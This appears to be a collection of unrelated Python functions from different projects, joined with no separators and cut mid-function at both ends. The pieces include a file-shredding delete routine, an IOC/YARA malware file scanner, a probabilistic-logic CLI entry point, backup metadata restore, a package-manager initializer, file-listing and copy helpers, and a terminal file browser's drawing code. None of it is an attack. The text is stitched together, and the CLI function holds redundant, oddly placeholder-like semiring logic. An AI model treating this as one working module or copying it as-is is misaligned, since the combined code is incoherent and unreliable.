                        block = block.filter_tagged_tasks(
                            play_context, all_vars)
                        if not block.has_tasks():
                            continue
                        taskmsg += _process_block(block)

                    if self.options.listtags:
                        cur_tags = list(mytags.union(all_tags))
                        cur_tags.sort()
                        taskmsg += " TASK TAGS: [%s]\n" % ', '.join(
                            cur_tags)

                    display.display(taskmsg)

        return 0
    else:
        return results
def delete(path, shred=False, ignore_missing=False, allow_shred=True):
    """Delete path that is either file, directory, link or FIFO.

    If shred is enabled as a function parameter or the BleachBit global
    parameter, the path will be shredded unless allow_shred = False.
    """
    from bleachbit.Options import options
    is_special = False
    path = extended_path(path)
    if not os.path.lexists(path):
        if ignore_missing:
            return
        raise OSError(2, 'No such file or directory', path)
    if 'posix' == os.name:
        # With certain (relatively rare) files on Windows os.lstat()
        # may return Access Denied
        mode = os.lstat(path)[stat.ST_MODE]
        # FIFOs and symlinks are removed directly, never shredded.
        is_special = stat.S_ISFIFO(mode) or stat.S_ISLNK(mode)
    if is_special:
        os.remove(path)
    elif os.path.isdir(path):
        delpath = path
        if allow_shred and (shred or options.get('shred')):
            # Obfuscate the directory name before removal.
            delpath = wipe_name(path)
        try:
            os.rmdir(delpath)
        except OSError as e:
            # [Errno 39] Directory not empty
            # https://bugs.launchpad.net/bleachbit/+bug/1012930
            if errno.ENOTEMPTY == e.errno:
                logger.info("directory is not empty: %s", path)
            else:
                raise
        except WindowsError as e:
            # WindowsError: [Error 145] The directory is not empty:
            # 'C:\\Documents and Settings\\username\\Local Settings\\Temp\\NAILogs'
            # Error 145 may happen if the files are scheduled for deletion
            # during reboot.
            if 145 == e.winerror:
                logger.info("directory is not empty: %s", path)
            else:
                raise
    elif os.path.isfile(path):
        # wipe contents
        if allow_shred and (shred or options.get('shred')):
            try:
                wipe_contents(path)
            except pywinerror as e:
                # 2 = The system cannot find the file specified.
                # This can happen with a broken symlink
                # https://github.com/bleachbit/bleachbit/issues/195
                if 2 != e.winerror:
                    raise
                # If a broken symlink, try os.remove() below.
            except IOError as e:
                # permission denied (13) happens shredding MSIE 8 on Windows 7
                logger.debug("IOError #%s shredding '%s'", e.errno, path,
                             exc_info=True)
            # wipe name
            os.remove(wipe_name(path))
        else:
            # unlink
            os.remove(path)
    else:
        logger.info("special file type cannot be deleted: %s", path)
def scanPath(path, rule_sets, filename_iocs, hashes, false_hashes):
    """Recursively scan *path* for indicators of compromise.

    Applies file-name IOC regexes, known-malware hash matching and YARA
    rule sets; findings are reported through log(). Python 2 code
    (`except Exception, e`).
    """
    # Startup
    log("INFO", "Scanning %s ... " % path)
    # Counter
    c = 0
    # Get application path
    appPath = getApplicationPath()
    # Linux excludes from mtab
    if isLinux:
        allExcludes = LINUX_PATH_SKIPS_START | Set(getExcludedMountpoints())
    for root, directories, files in scandir.walk(path, onerror=walkError,
                                                 followlinks=False):
        if isLinux:
            # Skip paths that start with ..
            newDirectories = []
            for dir in directories:
                skipIt = False
                completePath = os.path.join(root, dir)
                for skip in allExcludes:
                    if completePath.startswith(skip):
                        log("INFO", "Skipping %s directory" % skip)
                        skipIt = True
                if not skipIt:
                    newDirectories.append(dir)
            # In-place so os.walk honours the pruning.
            directories[:] = newDirectories
        # Loop through files
        for filename in files:
            try:
                # Get the file and path
                filePath = os.path.join(root, filename)
                # Linux directory skip
                if isLinux:
                    # Skip paths that end with ..
                    for skip in LINUX_PATH_SKIPS_END:
                        if filePath.endswith(skip):
                            if LINUX_PATH_SKIPS_END[skip] == 0:
                                log("INFO", "Skipping %s element" % skip)
                                LINUX_PATH_SKIPS_END[skip] = 1
                # File mode: skip anything that is not a plain file.
                mode = os.stat(filePath).st_mode
                if stat.S_ISCHR(mode) or stat.S_ISBLK(mode) or \
                        stat.S_ISFIFO(mode) or stat.S_ISLNK(mode) or \
                        stat.S_ISSOCK(mode):
                    continue
                # Counter
                c += 1
                if not args.noindicator:
                    printProgress(c)
                # Skip program directory
                if appPath.lower() in filePath.lower():
                    log("DEBUG",
                        "Skipping file in program directory FILE: %s" % filePath)
                    continue
                fileSize = os.stat(filePath).st_size
                # print file_size
                # File Name Checks -------------------------------------------------
                for regex in filename_iocs.keys():
                    match = re.search(r'%s' % regex, filePath)
                    if match:
                        description = filenameIOC_desc[regex]
                        score = filename_iocs[regex]
                        if score > 70:
                            log("ALERT",
                                "File Name IOC matched PATTERN: %s DESC: %s MATCH: %s" %
                                (regex, description, filePath))
                        elif score > 40:
                            log("WARNING",
                                "File Name Suspicious IOC matched PATTERN: %s DESC: %s MATCH: %s" %
                                (regex, description, filePath))
                # Access check (also used for magic header detection)
                firstBytes = ""
                try:
                    with open(filePath, 'rb') as f:
                        firstBytes = f.read(4)
                except Exception, e:
                    log("DEBUG",
                        "Cannot open file %s (access denied)" % filePath)
                # Evaluate Type (magic bytes: MZ = PE, MDMP = minidump)
                fileType = ""
                if firstBytes.startswith('\x4d\x5a'):
                    fileType = "EXE"
                if firstBytes.startswith('\x4d\x44\x4d\x50'):
                    fileType = "MDMP"
                # Set fileData to an empty value
                fileData = ""
                # Evaluations -------------------------------------------------------
                # Evaluate size
                do_intense_check = True
                if fileSize > (args.s * 1024):
                    # Print files
                    if args.printAll:
                        log("INFO", "Checking %s" % filePath)
                    do_hash_check = False
                else:
                    if args.printAll:
                        log("INFO", "Scanning %s" % filePath)
                # Some file types will force intense check
                if fileType == "MDMP":
                    do_intense_check = True
                # Hash Check -------------------------------------------------------
                # Do the check
                md5 = "-"
                sha1 = "-"
                sha256 = "-"
                if do_intense_check:
                    fileData = readFileData(filePath)
                    md5, sha1, sha256 = generateHashes(fileData)
                    log("DEBUG",
                        "MD5: %s SHA1: %s SHA256: %s FILE: %s" %
                        (md5, sha1, sha256, filePath))
                    # False Positive Hash
                    if md5 in false_hashes.keys() or \
                            sha1 in false_hashes.keys() or \
                            sha256 in false_hashes.keys():
                        continue
                    # Malware Hash
                    matchType = None
                    matchDesc = None
                    matchHash = None
                    if md5 in hashes.keys():
                        matchType = "MD5"
                        matchDesc = hashes[md5]
                        matchHash = md5
                    elif sha1 in hashes.keys():
                        matchType = "SHA1"
                        matchDesc = hashes[sha1]
                        matchHash = sha1
                    elif sha256 in hashes.keys():
                        matchType = "SHA256"
                        matchDesc = hashes[sha256]
                        matchHash = sha256
                    if matchType:
                        log("ALERT",
                            "Malware Hash TYPE: %s HASH: %s FILE: %s DESC: %s" %
                            (matchType, matchHash, filePath, matchDesc))
                # Yara Check -------------------------------------------------------
                # Size and type check
                if do_intense_check:
                    # Read file data if hash check has been skipped
                    if not fileData:
                        fileData = readFileData(filePath)
                    # Memory Dump Scan
                    if fileType == "MDMP":
                        log("INFO",
                            "Scanning memory dump file %s" % filePath)
                    # Scan with yara
                    try:
                        for rules in rule_sets:
                            # Yara Rule Match
                            matches = rules.match(
                                data=fileData,
                                externals={
                                    'filename': filename.lower(),
                                    'filepath': filePath.lower()
                                })
                            # If matched
                            if matches:
                                for match in matches:
                                    score = 70
                                    description = "not set"
                                    # Built-in rules have meta fields (cannot be expected from custom rules)
                                    if hasattr(match, 'meta'):
                                        if 'description' in match.meta:
                                            description = match.meta['description']
                                        # If a score is given
                                        if 'score' in match.meta:
                                            score = int(match.meta['score'])
                                    # Hash string
                                    hash_string = "MD5: %s SHA1: %s SHA256: %s" % (
                                        md5, sha1, sha256)
                                    # Matching strings
                                    matched_strings = ""
                                    if hasattr(match, 'strings'):
                                        # Get matching strings
                                        matched_strings = getStringMatches(
                                            match.strings)
                                    if score >= 70:
                                        log("ALERT",
                                            "Yara Rule MATCH: %s FILE: %s %s MATCHES: %s" %
                                            (match.rule, filePath, hash_string, matched_strings))
                                    elif score >= 40:
                                        log("WARNING",
                                            "Yara Rule MATCH: %s FILE: %s %s MATCHES: %s" %
                                            (match.rule, filePath, hash_string, matched_strings))
                    except Exception, e:
                        if args.debug:
                            traceback.print_exc()
            except Exception, e:
                # Per-file guard: one unreadable file must not abort the walk.
                if args.debug:
                    traceback.print_exc()
def main(argv, result_handler=None):
    """CLI entry point: parse arguments, select an output handler, and run inference.

    argv           -- argument list (without the program name).
    result_handler -- optional callable(result, output) -> exit code; when None
                      one is chosen from the parsed options.

    NOTE(review): exits via sys.exit() on several paths; `argparser`, `execute`,
    `library_paths`, the Semiring* classes and the print_result* helpers are
    defined elsewhere in this module.
    """
    parser = argparser()
    args = parser.parse_args(argv)

    # Extra library search paths accumulate in the module-level list.
    if args.library:
        for path in args.library:
            library_paths.append(path)

    # Pick a result handler based on the requested output format, unless the
    # caller supplied one explicitly.
    if result_handler is None:
        if args.web:
            result_handler = print_result_json
        elif args.format == 'prolog':
            result_handler = lambda *a: print_result_prolog(*a, debug=args.debug)
        else:
            result_handler = lambda *a: print_result(*a, debug=args.debug)

    init_logger(args.verbose)

    # Output goes to stdout by default; an explicit file is closed at the end.
    if args.output is None:
        output = sys.stdout
    else:
        output = open(args.output, 'w')

    if args.timeout:
        start_timer(args.timeout)

    if len(args.filenames) == 0:
        # No files given: accept stdin only when it is a pipe or a redirected
        # regular file ('-' is the stdin marker), never an interactive terminal.
        mode = os.fstat(0).st_mode
        if stat.S_ISFIFO(mode) or stat.S_ISREG(mode):
            # stdin is piped or redirected
            args.filenames = ['-']
        else:
            # stdin is terminal
            # No interactive input, exit
            print('ERROR: Expected a file or stream as input.\n', file=sys.stderr)
            parser.print_help()
            sys.exit(1)

    # Choose the semiring used for weight computation.
    if args.logspace:
        semiring = SemiringLogProbability()
    else:
        semiring = SemiringSymbolic() if False else SemiringProbability()  # noqa: placeholder never taken

    if args.logspace:
        semiring = SemiringLogProbability()
    else:
        semiring = SemiringProbability()

    # --symbolic forces the 'nnf' knowledge option and symbolic evaluation.
    if args.symbolic:
        args.koption = 'nnf'
        semiring = SemiringSymbolic()

    if args.propagate_weights:
        args.propagate_weights = semiring

    if args.combine:
        # All files are evaluated together as a single model.
        result = execute(args.filenames, args.koption, semiring, **vars(args))
        retcode = result_handler(result, output)
        sys.exit(retcode)
    else:
        # Evaluate each file independently; with a single file the handler's
        # return code becomes the process exit code.
        for filename in args.filenames:
            if len(args.filenames) > 1:
                print ('Results for %s:' % filename)
            result = execute(filename, args.koption, semiring, **vars(args))
            retcode = result_handler(result, output)
            if len(args.filenames) == 1:
                sys.exit(retcode)

    if args.output is not None:
        output.close()

    if args.timeout:
        stop_timer()
def _create_via_common_rec(self, path, create_symlinks=True):
    """Create a filesystem node at *path* matching this metadata record's type.

    Regular files/dirs are created empty with restrictive modes (0600/0700);
    the real mode/content is presumably applied later by the caller — TODO
    confirm against the restore pipeline. Raises ApplyError when no mode is
    recorded, and refuses to replace a non-empty directory.
    """
    if not self.mode:
        raise ApplyError('no metadata - cannot create path ' + path)

    # If the path already exists and is a dir, try rmdir.
    # If the path already exists and is anything else, try unlink.
    st = None
    try:
        st = xstat.lstat(path)
    except OSError as e:
        # ENOENT just means nothing to remove; anything else is fatal.
        if e.errno != errno.ENOENT:
            raise
    if st:
        if stat.S_ISDIR(st.st_mode):
            try:
                os.rmdir(path)
            except OSError as e:
                if e.errno in (errno.ENOTEMPTY, errno.EEXIST):
                    msg = 'refusing to overwrite non-empty dir ' + path
                    raise Exception(msg)
                raise
        else:
            os.unlink(path)

    if stat.S_ISREG(self.mode):
        assert (self._recognized_file_type())
        # O_EXCL guarantees we create the file (nothing raced us after the
        # unlink above); content is written elsewhere.
        fd = os.open(path, os.O_CREAT | os.O_WRONLY | os.O_EXCL, 0o600)
        os.close(fd)
    elif stat.S_ISDIR(self.mode):
        assert (self._recognized_file_type())
        os.mkdir(path, 0o700)
    elif stat.S_ISCHR(self.mode):
        assert (self._recognized_file_type())
        os.mknod(path, 0o600 | stat.S_IFCHR, self.rdev)
    elif stat.S_ISBLK(self.mode):
        assert (self._recognized_file_type())
        os.mknod(path, 0o600 | stat.S_IFBLK, self.rdev)
    elif stat.S_ISFIFO(self.mode):
        assert (self._recognized_file_type())
        os.mknod(path, 0o600 | stat.S_IFIFO)
    elif stat.S_ISSOCK(self.mode):
        try:
            os.mknod(path, 0o600 | stat.S_IFSOCK)
        except OSError as e:
            # Some platforms cannot mknod a socket; fall back to binding a
            # real UNIX socket at the path.
            if e.errno in (errno.EINVAL, errno.EPERM):
                s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
                s.bind(path)
            else:
                raise
    elif stat.S_ISLNK(self.mode):
        assert (self._recognized_file_type())
        if self.symlink_target and create_symlinks:
            # on MacOS, symlink() permissions depend on umask, and there's
            # no way to chown a symlink after creating it, so we have to
            # be careful here!
            oldumask = os.umask((self.mode & 0o777) ^ 0o777)
            try:
                os.symlink(self.symlink_target, path)
            finally:
                os.umask(oldumask)
    # FIXME: S_ISDOOR, S_IFMPB, S_IFCMP, S_IFNWK, ... see stat(2).
    else:
        assert (not self._recognized_file_type())
        add_error('not creating "%s" with unrecognized mode "0x%x"\n'
                  % (path, self.mode))
def initialize():
    """Initialize the package manager singleton state (idempotent).

    Validates/creates the package directory and the messenger FIFO, then
    creates the module-level queue, lock and worker threads. On any failure
    the offending global is set to None and the function returns early
    without marking the manager initialized.

    NOTE(review): Python 2 code (`basestring`, `Thread.isAlive`); all state
    lives in module-level globals declared below.
    """
    global is_package_manager_initialized
    if is_package_manager_initialized:
        log.debug("Package manager is already initialized")
        return

    # Validate package path
    global package_path
    assert(isinstance(package_path, basestring))
    if os.path.isdir(package_path):
        # Probe readability; an unreadable dir invalidates the configuration.
        try:
            os.listdir(package_path)
        except OSError:
            package_path = None
            log.error("Could not access package path")
            return
    else:
        log.debug("Could not find package path: " + package_path)
        try:
            os.makedirs(package_path)
            log.info("Created package path: " + package_path)
        except OSError:
            package_path = None
            log.error("Could not create package path")
            return

    # Validate package messenger pipe
    global package_messenger_pipe
    assert(isinstance(package_messenger_pipe, basestring))
    if os.path.exists(package_messenger_pipe):
        # An existing path must already be a FIFO; anything else is an error.
        if stat.S_ISFIFO(os.stat(package_messenger_pipe).st_mode):
            pass
        else:
            log.error("Pipe path exists, but it is not a pipe")
            package_messenger_pipe = None
            return
    else:
        # Create the parent directory (if needed) and then the FIFO itself.
        package_messenger_pipe_dir = os.path.dirname(package_messenger_pipe)
        if not os.path.isdir(package_messenger_pipe_dir):
            try:
                os.makedirs(package_messenger_pipe_dir)
                log.info("Created directory: " + package_messenger_pipe_dir)
            except OSError:
                package_messenger_pipe = None
                log.error("Could not create directory for messenger pipe")
                return
        try:
            os.mkfifo(package_messenger_pipe)
            log.info("Created pipe: " + package_messenger_pipe)
        except OSError:
            package_messenger_pipe = None
            log.error("Could not create messenger pipe")
            return
    # Sanity check: by now the pipe must exist and be a FIFO.
    assert(stat.S_ISFIFO(os.stat(package_messenger_pipe).st_mode))

    # Will not initialize package manager if package path is mis-configured
    if package_path is None:
        log.error("Package manager failed because package path is invalid")
        return

    # Initialization of package manager
    global package_message_queue
    if package_message_queue is None:
        package_message_queue = Queue()
    global package_lock
    if package_lock is None:
        package_lock = Lock()
    global package_thread
    if package_thread is None:
        package_thread = PackageThread(name="PackageThread")

    # PackageMessengerThread should start last because it triggers actions
    global package_messenger_thread
    if package_messenger_thread is None:
        if package_thread.isAlive():
            package_messenger_thread = \
                PackageMessengerThread(
                    pipe_file=package_messenger_pipe,
                    name="PackageMessengerThread"
                )
        else:
            log.warning("Package messenger will not start")

    # Mark package manager as initialized
    is_package_manager_initialized = True
    log.info("Package manager is initialized")
def unix_item_ls(the_path, ls_format, root_folder=None):
    """Collect ls-style fields for *the_path*, keyed by format character.

    Supported characters in *ls_format*:
      I inode, R permission string, L link count, u/U uid/user name,
      g/G gid/group name, S size, T mtime, C checksum (files only),
      P/p full/relative path (with 'D'/'E' decorations).

    Returns a dict mapping each requested character to its value. Any OS
    error (e.g. the path vanished) yields a partial/empty dict — errors are
    deliberately swallowed so directory listings keep going.

    Bug fix: the numeric fallbacks previously did str(uid)[0] / str(gid)[0],
    returning only the first digit of the id; the [0] was a copy/paste from
    pwd.getpwuid(...)[0] (the name field) and is dropped here.
    """
    import grp
    import pwd

    the_parts = dict()
    if 'p' in ls_format or 'P' in ls_format:
        the_parts['p'] = the_path

    try:
        the_stats = os.lstat(the_path)

        for format_char in ls_format:
            if format_char == 'I':
                the_parts[format_char] = the_stats[stat.ST_INO]  # inode number
            elif format_char == 'R':
                the_parts[format_char] = utils.unix_permissions_to_str(
                    the_stats.st_mode)  # permissions
            elif format_char == 'L':
                the_parts[format_char] = the_stats[stat.ST_NLINK]  # num links
            elif format_char == 'u':
                try:
                    # numeric uid as a string (full number, not just 1st digit)
                    the_parts[format_char] = str(the_stats[stat.ST_UID])
                except Exception:
                    the_parts[format_char] = "no_uid"
            elif format_char == 'U':
                try:
                    the_parts[format_char] = pwd.getpwuid(
                        the_stats[stat.ST_UID])[0]  # user name
                except KeyError:
                    # unknown user name, fall back to the numeric uid
                    the_parts[format_char] = str(the_stats[stat.ST_UID])
                except Exception:
                    the_parts[format_char] = "no_uid"
            elif format_char == 'g':
                try:
                    # numeric gid as a string (full number, not just 1st digit)
                    the_parts[format_char] = str(the_stats[stat.ST_GID])
                except Exception:
                    the_parts[format_char] = "no_gid"
            elif format_char == 'G':
                try:
                    the_parts[format_char] = grp.getgrgid(
                        the_stats[stat.ST_GID])[0]  # group name
                except KeyError:
                    # unknown group name, fall back to the numeric gid
                    the_parts[format_char] = str(the_stats[stat.ST_GID])
                except Exception:
                    the_parts[format_char] = "no_gid"
            elif format_char == 'S':
                the_parts[format_char] = the_stats[stat.ST_SIZE]  # size in bytes
            elif format_char == 'T':
                the_parts[format_char] = time.strftime(
                    "%Y/%m/%d-%H:%M:%S",
                    time.gmtime((the_stats[stat.ST_MTIME])))  # modification time
            elif format_char == 'C':
                # checksum only makes sense for real file contents
                if not (stat.S_ISLNK(the_stats.st_mode)
                        or stat.S_ISDIR(the_stats.st_mode)):
                    the_parts[format_char] = utils.get_file_checksum(the_path)
                else:
                    the_parts[format_char] = ""
            elif format_char == 'P' or format_char == 'p':
                path_to_return = the_path
                if format_char == 'p' and root_folder is not None:
                    path_to_return = os.path.relpath(the_path, start=root_folder)

                # E will bring us Extra data (path postfix) but we want to know
                # if it's DIR in any case
                if stat.S_ISDIR(the_stats.st_mode) and 'D' in ls_format:
                    path_to_return += '/'

                if 'E' in ls_format:
                    if stat.S_ISLNK(the_stats.st_mode):
                        path_to_return += '@'
                    elif not stat.S_ISDIR(the_stats.st_mode) and (
                            the_stats.st_mode
                            & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)):
                        path_to_return += '*'
                    elif stat.S_ISSOCK(the_stats.st_mode):
                        path_to_return += '='
                    elif stat.S_ISFIFO(the_stats.st_mode):
                        path_to_return += '|'

                the_parts[format_char] = path_to_return
    except Exception:
        # best-effort: a vanished/unreadable path yields a partial dict
        pass

    return the_parts
def hardlinkable(mode):
    """return True if we support hardlinked items of this type"""
    supported_checks = (stat.S_ISREG, stat.S_ISBLK, stat.S_ISCHR, stat.S_ISFIFO)
    return any(check(mode) for check in supported_checks)
def _draw_directory(self):
    """Draw the contents of a directory

    Renders one row per visible file into the curses window, building a list
    of color tags (selected/marked/tagged/file-type/...) per row and applying
    them with color_at(). Early-returns for unloaded, inaccessible or empty
    targets. NOTE(review): ranger browser-column code; relies heavily on
    widget state (self.target, self.env, self.fm) set elsewhere.
    """
    # Skip preview columns unless directory previews are enabled.
    if self.level > 0 and not self.settings.preview_directories:
        return
    base_color = ['in_browser']
    self.win.move(0, 0)
    if not self.target.content_loaded:
        # Directory is still loading in the background.
        self.color(base_color)
        self.addnstr("...", self.wid)
        self.color_reset()
        return
    if self.main_column:
        base_color.append('main_column')
    if not self.target.accessible:
        self.color(base_color, 'error')
        self.addnstr("not accessible", self.wid)
        self.color_reset()
        return
    if self.target.empty():
        self.color(base_color, 'empty')
        self.addnstr("empty", self.wid)
        self.color_reset()
        return
    self._set_scroll_begin()
    # Paths currently on the cut/copy clipboard (for 'cut'/'copied' colors).
    copied = [f.path for f in self.env.copy]
    ellipsis = self.ellipsis[self.settings.unicode_ellipsis]
    selected_i = self.target.pointer
    for line in range(self.hei):
        i = line + self.scroll_begin
        try:
            drawn = self.target.files[i]
        except IndexError:
            # Fewer files than screen rows: stop drawing.
            break

        # Optional right-aligned info column (e.g. file size).
        if self.display_infostring and drawn.infostring \
                and self.settings.display_size_in_main_column:
            infostring = str(drawn.infostring) + " "
        else:
            infostring = ""

        bad_info_color = None
        this_color = base_color + list(drawn.mimetype_tuple)
        text = drawn.basename
        tagged = self.fm.tags and drawn.realpath in self.fm.tags

        # Horizontal space left for the file name.
        space = self.wid - len(infostring)
        if self.main_column:
            space -= 2

        # if len(text) > space:
        #     text = text[:space-1] + self.ellipsis

        if i == selected_i:
            this_color.append('selected')

        if drawn.marked:
            this_color.append('marked')
            if self.main_column:
                text = " " + text

        if tagged:
            this_color.append('tagged')
            if self.main_column:
                text = self.tagged_marker + text

        if drawn.is_directory:
            this_color.append('directory')
        else:
            this_color.append('file')

        if drawn.stat:
            # Derive extra color tags from the stat mode bits.
            mode = drawn.stat.st_mode
            if mode & stat.S_IXUSR:
                this_color.append('executable')
            if stat.S_ISFIFO(mode):
                this_color.append('fifo')
            if stat.S_ISSOCK(mode):
                this_color.append('socket')
            if drawn.is_device:
                this_color.append('device')

        if drawn.path in copied:
            this_color.append('cut' if self.env.cut else 'copied')

        if drawn.is_link:
            this_color.append('link')
            this_color.append(drawn.exists and 'good' or 'bad')

        string = drawn.basename
        from ranger.ext.widestring import WideString
        # WideString handles double-width (CJK) characters when truncating.
        wtext = WideString(text)
        if len(wtext) > space:
            wtext = wtext[:space - 1] + ellipsis
        if self.main_column:
            if tagged:
                self.addstr(line, 0, str(wtext))
            elif self.wid > 1:
                self.addstr(line, 1, str(wtext))
        else:
            self.addstr(line, 0, str(wtext))

        if infostring:
            x = self.wid - 1 - len(infostring)
            if infostring is BAD_INFO:
                bad_info_color = (x, len(infostring))
            if x > 0:
                self.addstr(line, x, infostring)

        self.color_at(line, 0, self.wid, this_color)
        if bad_info_color:
            start, wid = bad_info_color
            self.color_at(line, start, wid, this_color, 'badinfo')

        if self.main_column and tagged and self.wid > 2:
            this_color.append('tag_marker')
            self.color_at(line, 0, len(self.tagged_marker), this_color)

        self.color_reset()
def _is_fifo(self): r = stat.S_ISFIFO(self.stat.st_mode) if r: self.type = 'fifo' return r
def get_file_metadata(path, hashes):
    """
    Get a generator for the metadata of the file at system path @path.
    The generator yields, in order:

    1. A boolean indicating whether the file exists.
    2. st_dev, if the file exists.
    3. Tuple of (S_IFMT(st_mode), file type as string), if the file
       exists.
    4. st_size, if the file exists and is a regular file. Note that
       it may be 0 on some filesystems, so treat the value with caution.
    5. st_mtime, if the file exists and is a regular file.
    6. A dict of @hashes and their values, if the file exists and
       is a regular file. Special __size__ member is added
       unconditionally.

    Note that the generator acquires resources, and does not release
    them until terminated. Always make sure to pull it until
    StopIteration, or close it explicitly.
    """
    try:
        # we want O_NONBLOCK to avoid blocking when opening pipes
        fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
    except OSError as err:
        if err.errno == errno.ENOENT:
            exists = False
            opened = False
        elif err.errno == errno.ENXIO:
            # unconnected device or socket
            exists = True
            opened = False
        else:
            raise
    else:
        exists = True
        opened = True

    try:
        # 1. does it exist?
        yield exists

        # we can't provide any more data for a file that does not exist
        if not exists:
            return

        # Prefer fstat on the open fd (race-free); fall back to stat by path
        # for the ENXIO case where we could not open it.
        if opened:
            st = os.fstat(fd)
        else:
            st = os.stat(path)

        # 2. st_dev
        yield st.st_dev

        # 3. file type tuple
        if stat.S_ISREG(st.st_mode):
            ftype = 'regular file'
        elif stat.S_ISDIR(st.st_mode):
            ftype = 'directory'
        elif stat.S_ISCHR(st.st_mode):
            ftype = 'character device'
        elif stat.S_ISBLK(st.st_mode):
            ftype = 'block device'
        elif stat.S_ISFIFO(st.st_mode):
            ftype = 'named pipe'
        elif stat.S_ISSOCK(st.st_mode):
            ftype = 'UNIX socket'
        else:
            ftype = 'unknown'
        yield (stat.S_IFMT(st.st_mode), ftype)

        # Non-regular files get no size/mtime/checksums; release the fd here
        # since the `with f` below will never take ownership of it.
        if not stat.S_ISREG(st.st_mode):
            if opened:
                os.close(fd)
            return

        # 4. st_size
        yield st.st_size
        # 5. st_mtime
        yield st.st_mtime

        # From here on the file object owns the fd and will close it.
        f = io.open(fd, 'rb')
    except:
        # NOTE(review): bare except is deliberate — the fd must be released
        # even on GeneratorExit/KeyboardInterrupt before re-raising.
        if opened:
            os.close(fd)
        raise

    with f:
        # open() might have left the file as O_NONBLOCK
        # make sure to fix that
        fcntl.fcntl(fd, fcntl.F_SETFL, 0)

        # 5. checksums
        e_hashes = sorted(hashes)
        hashes = list(gemato.manifest.manifest_hashes_to_hashlib(e_hashes))
        e_hashes.append('__size__')
        hashes.append('__size__')
        checksums = gemato.hash.hash_file(f, hashes)

        # Map hashlib names back to the caller's (manifest) hash names.
        ret = {}
        for ek, k in zip(e_hashes, hashes):
            ret[ek] = checksums[k]
        yield ret
def isapipe(fd):
    """Return True when *fd* — an int descriptor or an object with a
    fileno() method — refers to a FIFO/pipe."""
    if hasattr(fd, 'fileno'):
        fileno = fd.fileno()
    else:
        fileno = fd
    return stat.S_ISFIFO(os.fstat(fileno).st_mode)
def expand(self):
    """Scan this directory on disk and build child nodes for new entries.

    Uses lstat on each entry to classify it (dir, regular file, symlink,
    socket, fifo, char/block device) and wraps it in the matching node
    class. Entries already present in self._children are skipped, so
    repeated calls only pick up new files. Returns the list of
    subdirectory nodes; also refreshes self._files/self._subdirectories.
    """
    import os
    import stat
    from BlockDevice import BlockDevice
    from CharacterDevice import CharacterDevice
    from File import File
    from Link import Link
    from NamedPipe import NamedPipe
    from Socket import Socket

    import journal
    debug = journal.debug("pyre.filesystem")

    files = []
    subdirectories = []

    root = self.path
    children = os.listdir(root)
    debug.log("directory '%s' has %d files" % (self.name, len(children)))

    count = 0
    for name in children:
        count += 1

        # Already known from a previous expand — don't rebuild the node.
        if name in self._children:
            continue

        pathname = os.path.join(root, name)
        # PORTABILITY: lstat is unix only
        mode = os.lstat(pathname)[stat.ST_MODE]
        if stat.S_ISDIR(mode):
            node = Directory(name, self)
            subdirectories.append(node)
        elif stat.S_ISREG(mode):
            node = File(name, self)
            files.append(node)
        elif stat.S_ISLNK(mode):
            node = Link(name, self)
        elif stat.S_ISSOCK(mode):
            node = Socket(name, self)
        elif stat.S_ISFIFO(mode):
            node = NamedPipe(name, self)
        elif stat.S_ISCHR(mode):
            node = CharacterDevice(name, self)
        elif stat.S_ISBLK(mode):
            node = BlockDevice(name, self)
        else:
            # Unclassifiable mode bits — report and (presumably) abort;
            # Firewall comes from the enclosing module. TODO confirm.
            Firewall.hit("unknown file type: mode=%x" % mode)

        self._children[node.name] = node

        # Progress logging for very large directories.
        if not count % 1000:
            debug.log("processed %d files" % count)

    debug.log("total files processed: %d" % count)

    self._files = files
    self._subdirectories = subdirectories

    return subdirectories
def is_pipe_or_link(path):
    """Check for named pipe."""
    # Symlink check first: it never raises and short-circuits before the
    # stat() call (which would follow the link / fail on a missing target).
    if os.path.islink(path):
        return True
    return stat.S_ISFIFO(os.stat(path).st_mode)
def _cp(source, target, force, recursive, preserve, log, verbose,
        __recursion=0):
    """Copy *source* to *target* (cp-like semantics).

    source/target -- (path, stat-result-or-None) tuples.
    force         -- chmod+remove an unwritable existing target file.
    recursive     -- required to copy directories.
    preserve      -- keep source mode and atime/mtime on the copy.
    log/verbose   -- optional "`src' -> `dst'" logging.

    Raises OSError for same-file, permission and dir-over-file conflicts;
    NotImplementedError for symlinks, devices, FIFOs and sockets.
    """
    # '__recursion' is an internal var used to track if this is a recursive
    # call to this function or not
    DEBUG = False
    if DEBUG:
        print("_cp(source=%r, target=%r, force=%r, recursive=%r, "\
              "preserve=%r, log, verbose=%r)"\
              % (source[0], target[0], force, recursive, preserve, verbose))
    spath, sstat = source
    smode = sstat.st_mode
    tpath, tstat = target

    if stat.S_ISREG(smode):
        # 'cp file dir' at the top level copies INTO the directory.
        if not __recursion and tstat and stat.S_ISDIR(tstat.st_mode):
            tpath = os.path.join(tpath, _basename(spath))
            try:
                tstat = os.stat(tpath)
            except OSError:
                tstat = None
            target = (tpath, tstat)
        if tstat:
            if _samefile(spath, tpath):
                raise OSError(
                    0, "`%s' and `%s' are the same file" % (spath, tpath),
                    tpath)
            elif stat.S_ISDIR(tstat.st_mode):
                raise OSError(
                    0,
                    "cannot overwrite directory `%s' with non-directory"
                    % tpath, spath)
        if not os.access(spath, os.R_OK):
            raise OSError(0,
                          "cannot open source for reading: permission denied",
                          spath)
        if tstat and not os.access(tpath, os.W_OK):
            # Note: There is where GNU 'cp -i ...' would catch
            # "Permission denied" and offer:
            #   cp: overwrite `<target>', overriding mode 0444?
            if force:
                # Make the stale target writable, then remove it so the copy
                # recreates it fresh.
                os.chmod(tpath, 511)  # octal 777
                os.remove(tpath)
                tstat = None
                target = (tpath, tstat)
            else:
                raise OSError(
                    0, "cannot open target for writing: permission denied",
                    tpath)
        if log and verbose:
            log("`%s' -> `%s'", spath, tpath)
        fsrc = open(spath, 'rb')
        try:
            ftarget = open(tpath, 'wb')
            try:
                #XXX Should this be done in chunks?
                ftarget.write(fsrc.read())
            finally:
                ftarget.close()
        finally:
            fsrc.close()
        # Rules for setting permissions:
        # - if preserve is true: then preserve
        # - if target already existed: don't change permissions
        # - otherwise: set perms to perm(source) & ~umask
        if preserve:
            os.chmod(tpath, stat.S_IMODE(smode))
            os.utime(tpath, (sstat.st_atime, sstat.st_mtime))
        elif not tstat:
            # i.e. the target did not exist before the copy
            perm = stat.S_IMODE(smode) & ~_getumask()
            os.chmod(tpath, perm)
    elif stat.S_ISDIR(smode):
        if not recursive:
            raise OSError(0,
